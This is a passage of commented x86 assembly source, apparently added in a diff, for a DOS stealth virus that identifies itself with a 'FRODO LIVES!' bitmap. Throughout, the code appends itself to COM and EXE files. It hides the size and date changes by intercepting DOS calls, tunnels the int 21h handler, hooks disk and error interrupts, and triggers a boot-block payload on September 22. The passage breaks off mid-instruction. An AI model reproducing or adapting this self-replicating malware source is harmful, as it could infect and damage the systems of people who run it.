+randomFCBread: + mov bx,dx + mov si,[bx+21h] ; check if reading first + or si,[bx+23h] ; bytes + jnz go_exitotherint21 + jmp short continueFCBread + +sequentialFCBread: + mov bx,dx + mov ax,[bx+0Ch] ; check if reading first + or al,[bx+20h] ; bytes + jnz go_exitotherint21 +continueFCBread: + call checkFCBokinfect + jnc continuecontinueFCBread +go_exitotherint21: + jmp exitotherint21 +continuecontinueFCBread: + call _popall + call _pushall + call callint21 ; chain to original handler + mov [bp-4],ax ; set the return codes + mov [bp-8],cx ; properly + push ds ; save FCB pointer + push dx + call getdisktransferaddress + cmp word ptr [bx+14h],1 ; check for EXE infection + je FCBreadinfectedfile ; (IP = 1) + mov ax,[bx] ; check for COM infection + add ax,[bx+2] ; (checksum = 0) + add ax,[bx+4] + jz FCBreadinfectedfile + add sp,4 ; no infection, no stealth + jmp short _popall_then_exitint21 ; needed +FCBreadinfectedfile: + pop dx ; restore address of the FCB + pop ds + mov si,dx + push cs + pop es + mov di,offset tempFCB ; copy FCB to temporary one + mov cx,25h + rep movsb + mov di,offset tempFCB + push cs + pop ds + mov ax,[di+10h] ; get old file size + mov dx,[di+12h] + add ax,100Fh ; increase by virus size + adc dx,0 ; and round to the nearest + and ax,0FFF0h ; paragraph + mov [di+10h],ax ; insert new file size + mov [di+12h],dx + sub ax,0FFCh + sbb dx,0 + mov [di+21h],ax ; set new random record # + mov [di+23h],dx + mov word ptr [di+0Eh],1 ; record size = 1 + mov cx,1Ch + mov dx,di + mov ah,27h ; random block read 1Ch bytes + call callint21 + jmp _popall_then_exitint21 + +FCBgetfilesize: + push cs + pop es + mov si,dx + mov di,offset tempFCB ; copy FCB to temp buffer + mov cx,0025h + repz movsb + push ds + push dx + push cs + pop ds + mov dx,offset tempFCB + mov ah,0Fh ; FCB open file + call callint21 + mov ah,10h ; FCB close file + call callint21 + test byte ptr [tempFCB+15h],80h ; check date bit + pop si + pop ds + jz will_exitotherint21 ; exit if not infected + les bx,dword ptr cs:[tempFCB+10h] ; get filesize + mov ax,es + sub bx,1000h ; hide increase + sbb ax,0 + xor dx,dx + mov cx,word ptr cs:[tempFCB+0eh] ; get record size + dec cx + add bx,cx + adc ax,0 + inc cx + div cx + mov [si+23h],ax ; fix random access record # + xchg dx,ax + xchg bx,ax + div cx + mov [si+21h],ax ; fix random access record # + jmp _popall_then_exitint21 + +filenamefindfirstnext: + and word ptr cs:int21flags,-2 ; turn off trap flag + call _popall + call callint21 + call _pushall + jnb filenamefffnOK ; continue if a file is found + or word ptr cs:int21flags,1 + jmp _popall_then_exitint21 + +filenamefffnOK: + call getdisktransferaddress + test byte ptr [bx+19h],80h ; Check high bit of date + jnz filenamefffnfileinfected; Bit set if infected + jmp _popall_then_exitint21 +filenamefffnfileinfected: + sub word ptr [bx+1Ah],1000h ; hide file length increase + sbb word ptr [bx+1Ch],0 + sub byte ptr [bx+19h],0C8h ; and date change + jmp _popall_then_exitint21 + +createhandle: + push cx + and cx,7 ; mask the attributes + cmp cx,7 ; r/o, hidden, & system? + je exit_create_handle + pop cx + call replaceint13and24 + call callint21 ; chain to original int 21h + call restoreint13and24 + pushf + cmp byte ptr cs:errorflag,0 ; check if any errors yet + je no_errors_createhandle + popf +will_exitotherint21: + jmp exitotherint21 +no_errors_createhandle: + popf + jc other_error_createhandle; exit on error + mov bx,ax ; move handle to bx + mov ah,3Eh ; Close file + call callint21 + jmp short openhandle +other_error_createhandle: + or byte ptr cs:int21flags,1; turn on the trap flag + mov [bp-4],ax ; set the return code properly + jmp _popall_then_exitint21 +exit_create_handle: + pop cx + jmp exitotherint21 + +openhandle: + call getcurrentPSP + call checkdsdxokinfect + jc jmp_exitotherint21 + cmp byte ptr cs:handlesleft,0 ; make sure there is a free + je jmp_exitotherint21 ; entry in the table + call setup_infection ; open the file + cmp bx,0FFFFh ; error? + je jmp_exitotherint21 ; if so, exit + dec byte ptr cs:handlesleft + push cs + pop es + mov di,offset handletable + mov cx,14h + xor ax,ax ; find end of the table + repne scasw + mov ax,cs:currentPSP ; put the PSP value and the + mov es:[di-2],ax ; handle # in the table + mov es:[di+26h],bx + mov [bp-4],bx ; put handle # in return code +handleopenclose_exit: + and byte ptr cs:int21flags,0FEh ; turn off the trap flag + jmp _popall_then_exitint21 +jmp_exitotherint21: + jmp exitotherint21 + +handleclosefile: + push cs + pop es + call getcurrentPSP + mov di,offset handletable + mov cx,14h ; 14h entries max + mov ax,cs:currentPSP ; search for calling PSP +scanhandle_close: + repne scasw + jnz handlenotfound ; handle not trapped + cmp bx,es:[di+26h] ; does the handle correspond? + jne scanhandle_close ; if not, find another handle + mov word ptr es:[di-2],0 ; otherwise, clear handle + call infect_file + inc byte ptr cs:handlesleft ; fix handles left counter + jmp short handleopenclose_exit ; and exit +handlenotfound: + jmp exitotherint21 + +getdisktransferaddress: + push es + mov ah,2Fh ; Get disk transfer address + call callint21 ; to es:bx + push es + pop ds ; mov to ds:bx + pop es + retn +execute: + or al,al ; load and execute? + jz loadexecute ; yepper! + jmp checkloadnoexecute ; otherwise check if + ; load/no execute +loadexecute: + push ds ; save filename + push dx + mov word ptr cs:parmblock,bx; save parameter block and + mov word ptr cs:parmblock+2,es; move to ds:si + lds si,dword ptr cs:parmblock + mov di,offset copyparmblock ; copy the parameter block + mov cx,0Eh + push cs + pop es + rep movsb + pop si ; copy the filename + pop ds ; to the buffer + mov di,offset copyfilename + mov cx,50h + rep movsb + mov bx,0FFFFh + call allocate_memory ; allocate available memory + call _popall + pop bp ; save the parameters + pop word ptr cs:saveoffset ; on the stack + pop word ptr cs:savesegment + pop word ptr cs:int21flags + mov ax,4B01h ; load/no execute + push cs ; ds:dx -> file name + pop es ; es:bx -> parameter block + mov bx,offset copyparmblock + pushf ; perform interrupt 21h + call dword ptr cs:oldint21 + jnc continue_loadexecute ; continue if no error + or word ptr cs:int21flags,1; turn on trap flag + push word ptr cs:int21flags ; if error + push word ptr cs:savesegment ; restore stack + push word ptr cs:saveoffset + push bp ; restore the stack frame + mov bp,sp ; and restore ES:BX to + les bx,dword ptr cs:parmblock ; point to the parameter + jmp exitint21 ; block +continue_loadexecute: + call getcurrentPSP + push cs + pop es + mov di,offset handletable ; scan the handle table + mov cx,14h ; for the current PSP's +scanhandle_loadexecute: ; handles + mov ax,cs:currentPSP + repne scasw + jnz loadexecute_checkEXE + mov word ptr es:[di-2],0 ; clear entry in handle table + inc byte ptr cs:handlesleft ; fix handlesleft counter + jmp short scanhandle_loadexecute +loadexecute_checkEXE: + lds si,dword ptr cs:origcsip + cmp si,1 ; Check if EXE infected + jne loadexecute_checkCOM + mov dx,word ptr ds:oldheader+16h ; get initial CS + add dx,10h ; adjust for PSP + mov ah,51h ; Get current PSP segment + call callint21 + add dx,bx ;adjust for start load segment + mov word ptr cs:origcsip+2,dx + push word ptr ds:oldheader+14h ; save old IP + pop word ptr cs:origcsip + add bx,10h ; adjust for the PSP + add bx,word ptr ds:oldheader+0Eh ; add old SS + mov cs:origss,bx + push word ptr ds:oldheader+10h ; old SP + pop word ptr cs:origsp + jmp short perform_loadexecute +loadexecute_checkCOM: + mov ax,[si] ; Check if COM infected + add ax,[si+2] + add ax,[si+4] + jz loadexecute_doCOM ; exit if already infected + push cs ; otherwise check to see + pop ds ; if it is suitable for + mov dx,offset copyfilename ; infection + call checkdsdxokinfect + call setup_infection + inc byte ptr cs:hideclustercountchange + call infect_file ; infect the file + dec byte ptr cs:hideclustercountchange +perform_loadexecute: + mov ah,51h ; Get current PSP segment + call callint21 + call saveregs + call restoreBREAK + call swapvirint21 + call restoreregs + mov ds,bx ; ds = current PSP segment + mov es,bx ; es = current PSP segment + push word ptr cs:int21flags ; restore stack parameters + push word ptr cs:savesegment + push word ptr cs:saveoffset + pop word ptr ds:[0Ah] ; Set terminate address in PSP + pop word ptr ds:[0Ch] ; to return address found on + ; the stack + ; (int 21h caller CS:IP) + push ds + lds dx,dword ptr ds:[0Ah] ; Get terminate address in PSP + mov al,22h ; Set terminate address to it + call setvect + pop ds + popf + pop ax + mov ss,cs:origss ; restore the stack + mov sp,cs:origsp ; and + jmp dword ptr cs:origcsip ; perform the execute + +loadexecute_doCOM: + mov bx,[si+1] ; restore original COM file + mov ax,word ptr ds:[bx+si-261h] + mov [si],ax + mov ax,word ptr ds:[bx+si-25Fh] + mov [si+2],ax + mov ax,word ptr ds:[bx+si-25Dh] + mov [si+4],ax + jmp short perform_loadexecute +checkloadnoexecute: + cmp al,1 + je loadnoexecute + jmp exitotherint21 +loadnoexecute: + or word ptr cs:int21flags,1; turn on trap flag + mov word ptr cs:parmblock,bx; save pointer to parameter + mov word ptr cs:parmblock+2,es ; block + call _popall + call callint21 ; chain to int 21h + call _pushall + les bx,dword ptr cs:parmblock ; restore pointer to + ; parameter block + lds si,dword ptr es:[bx+12h]; get cs:ip on execute return + jc exit_loadnoexecute + and byte ptr cs:int21flags,0FEh ; turn off trap flag + cmp si,1 ; check for EXE infection + je loadnoexecute_EXE_already_infected + ; infected if initial IP = 1 + mov ax,[si] ; check for COM infection + add ax,[si+2] ; infected if checksum = 0 + add ax,[si+4] + jnz perform_the_execute + mov bx,[si+1] ; get jmp location + mov ax,ds:[bx+si-261h] ; restore original COM file + mov [si],ax + mov ax,ds:[bx+si-25Fh] + mov [si+2],ax + mov ax,ds:[bx+si-25Dh] + mov [si+4],ax + jmp short perform_the_execute +loadnoexecute_EXE_already_infected: + mov dx,word ptr ds:oldheader+16h ; get entry CS:IP + call getcurrentPSP + mov cx,cs:currentPSP + add cx,10h ; adjust for PSP + add dx,cx + mov es:[bx+14h],dx ; alter the entry point CS + mov ax,word ptr ds:oldheader+14h + mov es:[bx+12h],ax + mov ax,word ptr ds:oldheader+0Eh ; alter stack + add ax,cx + mov es:[bx+10h],ax + mov ax,word ptr ds:oldheader+10h + mov es:[bx+0Eh],ax +perform_the_execute: + call getcurrentPSP + mov ds,cs:currentPSP + mov ax,[bp+2] ; restore length as held in + mov word ptr ds:oldheader+6,ax + mov ax,[bp+4] ; the EXE header + mov word ptr ds:oldheader+8,ax +exit_loadnoexecute: + jmp _popall_then_exitint21 + +getDOSversion: + mov byte ptr cs:hide_size,0 + mov ah,2Ah ; Get date + call callint21 + cmp dx,916h ; September 22? + jb exitDOSversion ; leave if not + call writebootblock ; this is broken +exitDOSversion: + jmp exitotherint21 + +infect_file: + call replaceint13and24 + call findnextparagraphboundary + mov byte ptr ds:EXEflag,1 ; assume is an EXE file + cmp word ptr ds:readbuffer,'ZM' ; check here for regular + je clearlyisanEXE ; EXE header + cmp word ptr ds:readbuffer,'MZ' ; check here for alternate + je clearlyisanEXE ; EXE header + dec byte ptr ds:EXEflag ; if neither, assume is a + jz try_infect_com ; COM file +clearlyisanEXE: + mov ax,ds:lengthinpages ; get file size in pages + shl cx,1 ; and convert it to + mul cx ; bytes + add ax,200h ; add 512 bytes + cmp ax,si + jb go_exit_infect_file + mov ax,ds:minmemory ; make sure min and max memory + or ax,ds:maxmemory ; are not both zero + jz go_exit_infect_file + mov ax,ds:filesizelow ; get filesize in dx:ax + mov dx,ds:filesizehigh + mov cx,200h ; convert to pages + div cx + or dx,dx ; filesize multiple of 512? + jz filesizemultiple512 ; then don't increment # + inc ax ; pages +filesizemultiple512: + mov ds:lengthinpages,ax ; put in new values for length + mov ds:lengthMOD512,dx ; fields + cmp word ptr ds:initialIP,1 ; check if already infected + je exit_infect_file + mov word ptr ds:initialIP,1 ; set new entry point + mov ax,si ; calculate new entry point + sub ax,ds:headersize ; segment + mov ds:initialcs,ax ; put this in for cs + add word ptr ds:lengthinpages,8 ; 4K more + mov ds:initialSS,ax ; put entry segment in for SS + mov word ptr ds:initialSP,1000h ; set stack @ 1000h + call finish_infection +go_exit_infect_file: + jmp short exit_infect_file +try_infect_com: + cmp si,0F00h ; make sure file is under + jae exit_infect_file ; F00h paragraphs or else + ; it will be too large once it + ; is infected + mov ax,ds:readbuffer ; first save first 6 bytes + mov word ptr ds:oldheader,ax + add dx,ax + mov ax,ds:readbuffer+2 + mov word ptr ds:oldheader+2,ax + add dx,ax + mov ax,ds:readbuffer+4 + mov word ptr ds:oldheader+4,ax + add dx,ax ; exit if checksum = 0 + jz exit_infect_file ; since then it is already + ; infected + mov cl,0E9h ; encode jmp instruction + mov byte ptr ds:readbuffer,cl + mov ax,10h ; find file size + mul si + add ax,offset entervirus-3 ; calculate offset of jmp + mov word ptr ds:readbuffer+1,ax ; encode it + mov ax,ds:readbuffer ; checksum it to 0 + add ax,ds:readbuffer+2 + neg ax + mov ds:readbuffer+4,ax + call finish_infection +exit_infect_file: + mov ah,3Eh ; Close file + call callint21 + call restoreint13and24 + retn + + +findnextparagraphboundary: + push cs + pop ds + mov ax,5700h ; Get file time/date + call callint21 + mov ds:filetime,cx + mov ds:filedate,dx + mov ax,4200h ; Go to beginning of file + xor cx,cx + mov dx,cx + call callint21 + mov ah,3Fh ; Read first 1Ch bytes + mov cl,1Ch + mov dx,offset readbuffer + call callint21 + mov ax,4200h ; Go to beginning of file + xor cx,cx + mov dx,cx + call callint21 + mov ah,3Fh ; Read first 1Ch bytes + mov cl,1Ch + mov dx,offset oldheader + call callint21 + mov ax,4202h ; Go to end of file + xor cx,cx + mov dx,cx + call callint21 + mov ds:filesizelow,ax ; save filesize + mov ds:filesizehigh,dx + mov di,ax + add ax,0Fh ; round to nearest paragraph + adc dx,0 ; boundary + and ax,0FFF0h + sub di,ax ; di=# bytes to next paragraph + mov cx,10h ; normalize filesize + div cx ; to paragraphs + mov si,ax ; si = result + retn + + +finish_infection: + mov ax,4200h ; Go to beginning of file + xor cx,cx + mov dx,cx + call callint21 + mov ah,40h ; Write new header to file + mov cl,1Ch + mov dx,offset readbuffer + call callint21 + mov ax,10h ; convert paragraph boundary + mul si ; to a byte value + mov cx,dx + mov dx,ax + mov ax,4200h ; go to first paragraph + call callint21 ; boundary at end of file + xor dx,dx + mov cx,1000h + add cx,di + mov ah,40h ; Concatenate virus to file + call callint21 + mov ax,5701h ; Restore file time/date + mov cx,ds:filetime + mov dx,ds:filedate + test dh,80h ; check for infection bit + jnz highbitset + add dh,0C8h ; alter if not set yet +highbitset: + call callint21 + cmp byte ptr ds:DOSversion,3; if not DOS 3+, then + jb exit_finish_infection ; do not hide the alteration + ; in cluster count + cmp byte ptr ds:hideclustercountchange,0 + je exit_finish_infection + push bx + mov dl,ds:filedrive + mov ah,32h ; Get drive parameter block + call callint21 ; for drive dl + mov ax,cs:numfreeclusters + mov [bx+1Eh],ax ; alter free cluster count + pop bx +exit_finish_infection: + retn + + +checkFCBokinfect: + call saveregs + mov di,dx + add di,0Dh ; skip to extension + push ds + pop es + jmp short performchecksum ; and check checksum for valid + ; checksum + +checkdsdxokinfect: + call saveregs + push ds + pop es + mov di,dx + mov cx,50h ; max filespec length + xor ax,ax + mov bl,0 ; default drive + cmp byte ptr [di+1],':' ; Is there a drive spec? + jne ondefaultdrive ; nope, skip it + mov bl,[di] ; yup, get drive + and bl,1Fh ; and convert to number +ondefaultdrive: + mov cs:filedrive,bl + repne scasb ; find terminating 0 byte +performchecksum: + mov ax,[di-3] + and ax,0DFDFh ; convert to uppercase + add ah,al + mov al,[di-4] + and al,0DFh ; convert to uppercase + add al,ah + mov byte ptr cs:EXEflag,0 ; assume COM file + cmp al,0DFh ; COM checksum? + je COMchecksum + inc byte ptr cs:EXEflag ; assume EXE file + cmp al,0E2h ; EXE checksum? + jne otherchecksum +COMchecksum: + call restoreregs + clc ; mark no error + retn +otherchecksum: + call restoreregs + stc ; mark error + retn + + +getcurrentPSP: + push bx + mov ah,51h ; Get current PSP segment + call callint21 + mov cs:currentPSP,bx ; store it + pop bx + retn + + +setup_infection: + call replaceint13and24 + push dx + mov dl,cs:filedrive + mov ah,36h ; Get disk free space + call callint21 + mul cx ; ax = bytes per cluster + mul bx ; dx:ax = bytes free space + mov bx,dx + pop dx + or bx,bx ; less than 65536 bytes free? + jnz enough_free_space ; hopefully not + cmp ax,4000h ; exit if less than 16384 + jb exit_setup_infection ; bytes free +enough_free_space: + mov ax,4300h ; Get file attributes + call callint21 + jc exit_setup_infection ; exit on error + mov di,cx ; di = attributes + xor cx,cx + mov ax,4301h ; Clear file attributes + call callint21 + cmp byte ptr cs:errorflag,0 ; check for errors + jne exit_setup_infection + mov ax,3D02h ; Open file read/write + call callint21 + jc exit_setup_infection ; exit on error + mov bx,ax ; move handle to bx + ; xchg bx,ax is superior + mov cx,di + mov ax,4301h ; Restore file attributes + call callint21 + push bx + mov dl,cs:filedrive ; Get file's drive number + mov ah,32h ; Get drive parameter block + call callint21 ; for disk dl + mov ax,[bx+1Eh] ; Get free cluster count + mov cs:numfreeclusters,ax ; and save it + pop bx ; return handle + call restoreint13and24 + retn +exit_setup_infection: + xor bx,bx + dec bx ; return bx=-1 on error + call restoreint13and24 + retn + + +checkforinfection: + push cx + push dx + push ax + mov ax,4400h ; Get device information + call callint21 ; (set hide_size = 2) + xor dl,80h + test dl,80h ; Character device? If so, + jz exit_checkforinfection ; exit; cannot be infected + mov ax,5700h ; Otherwise get time/date + call callint21 + test dh,80h ; Check year bit for infection +exit_checkforinfection: + pop ax + pop dx + pop cx + retn + +obtainfilesize: + call saveregs + mov ax,4201h ; Get current file position + xor cx,cx + xor dx,dx + call callint21 + mov cs:curfileposlow,ax + mov cs:curfileposhigh,dx + mov ax,4202h ; Go to end of file + xor cx,cx + xor dx,dx + call callint21 + mov cs:filesizelow,ax + mov cs:filesizehigh,dx + mov ax,4200h ; Return to file position + mov dx,cs:curfileposlow + mov cx,cs:curfileposhigh + call callint21 + call restoreregs + retn + +getsetfiletimedate: + or al,al ; Get time/date? + jnz checkifsettimedate ; if not, see if Set time/date + and word ptr cs:int21flags,0FFFEh ; turn off trap flag + call _popall + call callint21 + jc gettimedate_error ; exit on error + test dh,80h ; check year bit if infected + jz gettimedate_notinfected + sub dh,0C8h ; if so, hide change +gettimedate_notinfected: + jmp exitint21 +gettimedate_error: + or word ptr cs:int21flags,1; turn on trap flag + jmp exitint21 +checkifsettimedate: + cmp al,1 ; Set time/date? + jne exit_filetimedate_pointer + and word ptr cs:int21flags,0FFFEh ; turn off trap flag + test dh,80h ; Infection bit set? + jz set_yearbitset + sub dh,0C8h ; clear infection bit +set_yearbitset: + call checkforinfection + jz set_datetime_nofinagle + add dh,0C8h ; set infection flag +set_datetime_nofinagle: + call callint21 + mov [bp-4],ax + adc word ptr cs:int21flags,0; turn on/off trap flag + jmp _popall_then_exitint21 ; depending on result + +handlemovefilepointer: + cmp al,2 + jne exit_filetimedate_pointer + call checkforinfection + jz exit_filetimedate_pointer + sub word ptr [bp-0Ah],1000h ; hide file size + sbb word ptr [bp-8],0 +exit_filetimedate_pointer: + jmp exitotherint21 + +handleread: + and byte ptr cs:int21flags,0FEh ; clear trap flag + call checkforinfection ; exit if it is not + jz exit_filetimedate_pointer ; infected -- no need + ; to do stealthy stuff + mov cs:savelength,cx + mov cs:savebuffer,dx + mov word ptr cs:return_code,0 + call obtainfilesize + mov ax,cs:filesizelow ; store the file size + mov dx,cs:filesizehigh + sub ax,1000h ; get uninfected file size + sbb dx,0 + sub ax,cs:curfileposlow ; check if currently in + sbb dx,cs:curfileposhigh ; virus code + jns not_in_virus_body ; continue if not + mov word ptr [bp-4],0 ; set return code = 0 + jmp handleopenclose_exit +not_in_virus_body: + jnz not_reading_header + cmp ax,cx ; reading from header? + ja not_reading_header + mov cs:savelength,ax ; # bytes into header +not_reading_header: + mov dx,cs:curfileposlow + mov cx,cs:curfileposhigh + or cx,cx ; if reading > 64K into file, + jnz finish_reading ; then no problems + cmp dx,1Ch ; if reading from header, then + jbe reading_from_header ; do stealthy stuff +finish_reading: + mov dx,cs:savebuffer + mov cx,cs:savelength + mov ah,3Fh ; read file + call callint21 + add ax,cs:return_code ; ax = bytes read + mov [bp-4],ax ; set return code properly + jmp _popall_then_exitint21 +reading_from_header: + mov si,dx + mov di,dx + add di,cs:savelength + cmp di,1Ch ; reading all of header? + jb read_part_of_header ; nope, calculate how much + xor di,di + jmp short do_read_from_header +read_part_of_header: + sub di,1Ch + neg di +do_read_from_header: + mov ax,dx + mov cx,cs:filesizehigh ; calculate location in + mov dx,cs:filesizelow ; the file of the virus + add dx,0Fh ; storage area for the + adc cx,0 ; original 1Ch bytes of + and dx,0FFF0h ; the file + sub dx,0FFCh + sbb cx,0 + add dx,ax + adc cx,0 + mov ax,4200h ; go to that location + call callint21 + mov cx,1Ch + sub cx,di + sub cx,si + mov ah,3Fh ; read the original header + mov dx,cs:savebuffer + call callint21 + add cs:savebuffer,ax + sub cs:savelength,ax + add cs:return_code,ax + xor cx,cx ; go past the virus's header + mov dx,1Ch + mov ax,4200h + call callint21 + jmp finish_reading ; and continue the reading + +handlewrite: + and byte ptr cs:int21flags,0FEh ; turn off trap flag + call checkforinfection + jnz continue_handlewrite + jmp exit_filetimedate_pointer +continue_handlewrite: + mov cs:savelength,cx + mov cs:savebuffer,dx + mov word ptr cs:return_code,0 + call obtainfilesize + mov ax,cs:filesizelow + mov dx,cs:filesizehigh + sub ax,1000h ; calculate original file + sbb dx,0 ; size + sub ax,cs:curfileposlow ; writing from inside the + sbb dx,cs:curfileposhigh ; virus? + js finish_write ; if not, we can continue + jmp short write_inside_virus; otherwise, fixup some stuff +finish_write: + call replaceint13and24 + push cs + pop ds + mov dx,ds:filesizelow ; calculate location in file + mov cx,ds:filesizehigh ; of the virus storage of the + add dx,0Fh ; original 1Ch bytes of the + adc cx,0 ; file + and dx,0FFF0h + sub dx,0FFCh + sbb cx,0 + mov ax,4200h + call callint21 + mov dx,offset oldheader + mov cx,1Ch + mov ah,3Fh ; read original header + call callint21 + mov ax,4200h ; go to beginning of file + xor cx,cx + mov dx,cx + call callint21 + mov dx,offset oldheader + mov cx,1Ch + mov ah,40h ; write original header to + call callint21 ; the file + mov dx,0F000h ; go back 4096 bytes + mov cx,0FFFFh ; from the end of the + mov ax,4202h ; file and + call callint21 + mov ah,40h ; truncate the file + xor cx,cx ; at that position + call callint21 + mov dx,ds:curfileposlow ; Go to current file position + mov cx,ds:curfileposhigh + mov ax,4200h + call callint21 + mov ax,5700h ; Get file time/date + call callint21 + test dh,80h + jz high_bit_aint_set + sub dh,0C8h ; restore file date + mov ax,5701h ; put it onto the disk + call callint21 +high_bit_aint_set: + call restoreint13and24 + jmp exitotherint21 +write_inside_virus: + jnz write_inside_header ; write from start of file? + cmp ax,cx + ja write_inside_header ; write from inside header? + jmp finish_write + +write_inside_header: + mov dx,cs:curfileposlow + mov cx,cs:curfileposhigh + or cx,cx ; Reading over 64K? + jnz writemorethan1Chbytes + cmp dx,1Ch ; Reading over 1Ch bytes? + ja writemorethan1Chbytes + jmp finish_write +writemorethan1Chbytes: + call _popall + call callint21 ; chain to int 21h + ; (allow write to take place) + call _pushall + mov ax,5700h ; Get file time/date + call callint21 + test dh,80h + jnz _popall_then_exitint21_ + add dh,0C8h + mov ax,5701h ; restore file date + call callint21 +_popall_then_exitint21_: + jmp _popall_then_exitint21 + + jmp exitotherint21 + +int13: + pop word ptr cs:int13tempCSIP ; get calling CS:IP off + pop word ptr cs:int13tempCSIP+2 ; the stack + pop word ptr cs:int13flags + and word ptr cs:int13flags,0FFFEh ; turn off trap flag + cmp byte ptr cs:errorflag,0 ; any errors yet? + jne exitint13error ; yes, already an error + push word ptr cs:int13flags + call dword ptr cs:origints + jnc exitint13 + inc byte ptr cs:errorflag ; mark error +exitint13error: + stc ; mark error +exitint13: + jmp dword ptr cs:int13tempCSIP ; return to caller + +int24: + xor al,al ; ignore error + mov byte ptr cs:errorflag,1 ; mark error + iret + +replaceint13and24: + mov byte ptr cs:errorflag,0 ; clear errors + call saveregs + push cs + pop ds + mov al,13h ; save int 13 handler + call getint + mov word ptr ds:origints,bx + mov word ptr ds:origints+2,es + mov word ptr ds:oldint13,bx + mov word ptr ds:oldint13+2,es + mov dl,0 + mov al,0Dh ; fixed disk interrupt + call getint + mov ax,es + cmp ax,0C000h ; is there a hard disk? + jae harddiskpresent ; C000+ is in BIOS + mov dl,2 +harddiskpresent: + mov al,0Eh ; floppy disk interrupt + call getint + mov ax,es + cmp ax,0C000h ; check if floppy + jae floppypresent + mov dl,2 +floppypresent: + mov ds:tracemode,dl + call replaceint1 + mov ds:savess,ss ; save stack + mov ds:savesp,sp + push cs ; save these on stack for + mov ax,offset setvirusints ; return to setvirusints + push ax + mov ax,70h + mov es,ax + mov cx,0FFFFh + mov al,0CBh ; retf + xor di,di + repne scasb ;scan es:di for retf statement + dec di ; es:di->retf statement + pushf + push es ; set up stack for iret to + push di ; the retf statement which + ; will cause transfer of + ; control to setvirusints + pushf + pop ax + or ah,1 ; turn on the trap flag + push ax + in al,21h ; save IMR in temporary + mov ds:saveIMR,al ; buffer and then + mov al,0FFh ; disable all the + out 21h,al ; interrupts + popf + xor ax,ax ; reset disk + jmp dword ptr ds:origints ; (int 13h call) + ; then transfer control to +setvirusints: ; setvirusints + lds dx,dword ptr ds:oldint1 + mov al,1 ; restore old int 1 handler + call setvect + push cs + pop ds + mov dx,offset int13 ; replace old int 13h handler + mov al,13h ; with virus's + call setvect + mov al,24h ; Get old critical error + call getint ; handler and save its + mov word ptr ds:oldint24,bx ; location + mov word ptr ds:oldint24+2,es + mov dx,offset int24 + mov al,24h ; Replace int 24 handler + call setvect ; with virus's handler + call restoreregs + retn + + +restoreint13and24: + call saveregs + lds dx,dword ptr cs:oldint13 + mov al,13h + call setvect + lds dx,dword ptr cs:oldint24 + mov al,24h + call setvect + call restoreregs + retn + + +disableBREAK: + mov ax,3300h ; Get current BREAK setting + call callint21 + mov cs:BREAKsave,dl + mov ax,3301h ; Turn BREAK off + xor dl,dl + call callint21 + retn + + +restoreBREAK: + mov dl,cs:BREAKsave + mov ax,3301h ; restore BREAK setting + call callint21 + retn + + +_pushall: + pop word ptr cs:pushpopalltempstore + pushf + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + jmp word ptr cs:pushpopalltempstore + +swapvirint21: + les di,dword ptr cs:oldint21; delve into original int + mov si,offset jmpfarptr ; handler and swap the first + push cs ; 5 bytes. This toggles it + pop ds ; between a jmp to the virus + cld ; code and the original 5 + mov cx,5 ; bytes of the int handler +swapvirint21loop: ; this is a tunnelling method + lodsb ; if I ever saw one + xchg al,es:[di] ; puts the bytes in DOS's + mov [si-1],al ; int 21h handler + inc di + loop swapvirint21loop + + retn + + +_popall: + pop word ptr cs:pushpopalltempstore + pop es + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + popf + jmp word ptr cs:pushpopalltempstore + +restoreregs: + mov word ptr cs:storecall,offset _popall + jmp short do_saverestoreregs + +saveregs: + mov word ptr cs:storecall,offset _pushall +do_saverestoreregs: + mov cs:storess,ss ; save stack + mov cs:storesp,sp + push cs + pop ss + mov sp,cs:stackptr ; set new stack + call word ptr cs:storecall + mov cs:stackptr,sp ; update internal stack ptr + mov ss,cs:storess ; and restore stack to + mov sp,cs:storesp ; caller program's stack + retn + + +replaceint1: + mov al,1 ; get the old interrupt + call getint ; 1 handler and save it + mov word ptr cs:oldint1,bx ; for later restoration + mov word ptr cs:oldint1+2,es + push cs + pop ds + mov dx,offset int1 ; set int 1 handler to + call setvect ; the virus int handler + retn + +allocatememory: + call allocate_memory + jmp exitotherint21 + +allocate_memory: + cmp byte ptr cs:checkres,0 ; installed check + je exitallocate_memory ; exit if installed + cmp bx,0FFFFh ; finding total memory? + jne exitallocate_memory ; (virus trying to install?) + mov bx,160h ; allocate memory to virus + call callint21 + jc exitallocate_memory ; exit on error + mov dx,cs + cmp ax,dx + jb continue_allocate_memory + mov es,ax + mov ah,49h ; Free memory + call callint21 + jmp short exitallocate_memory +continue_allocate_memory: + dec dx ; get segment of MCB + mov ds,dx + mov word ptr ds:[1],0 ; mark unused MCB + inc dx ; go to memory area + mov ds,dx + mov es,ax + push ax + mov word ptr cs:int21store+2,ax ; fixup segment + xor si,si + mov di,si + mov cx,0B00h + rep movsw ; copy virus up there + dec ax ; go to MCB + mov es,ax + mov ax,cs:ownerfirstMCB ; get DOS PSP ID + mov es:[1],ax ; make vir ID = DOS PSP ID + mov ax,offset exitallocate_memory + push ax + retf + +exitallocate_memory: + retn + +get_device_info: + mov byte ptr cs:hide_size,2 + jmp exitotherint21 + +callint21: ; call original int 21h handler (tunnelled) + pushf + call dword ptr cs:oldint21 + retn + +bootblock: + cli + xor ax,ax ; set new stack just below + mov ss,ax ; start of load area for + mov sp,7C00h ; boot block + jmp short enter_bootblock +borderchars db ' ' + +FRODO_LIVES: ; bitmapped 'FRODO LIVES!' + db 11111001b,11100000b,11100011b,11000011b,10000000b + db 10000001b,00010001b,00010010b,00100100b,01000000b + db 10000001b,00010001b,00010010b,00100100b,01000000b + db 11110001b,11110001b,00010010b,00100100b,01000000b + db 10000001b,00100001b,00010010b,00100100b,01000000b + db 10000001b,00010000b,11100011b,11000011b,10000000b + db 00000000b,00000000b,00000000b,00000000b,00000000b + db 00000000b,00000000b,00000000b,00000000b,00000000b + db 10000010b,01000100b,11111000b,01110000b,11000000b + db 10000010b,01000100b,10000000b,10001000b,11000000b + db 10000010b,01000100b,10000000b,10000000b,11000000b + db 10000010b,01000100b,11110000b,01110000b,11000000b + db 10000010b,00101000b,10000000b,00001000b,11000000b + db 10000010b,00101000b,10000000b,10001000b,00000000b + db 11110010b,00010000b,11111000b,01110000b,11000000b +enter_bootblock: + push cs + pop ds + mov dx,0B000h ; get video page in bh + mov ah,0Fh ; get video mode in al + int 10h ; get columns in ah + + cmp al,7 ; check if colour + je monochrome + mov dx,0B800h ; colour segment +monochrome: + mov es,dx ; es->video segment + cld + xor di,di + mov cx,25*80 ; entire screen + mov ax,720h 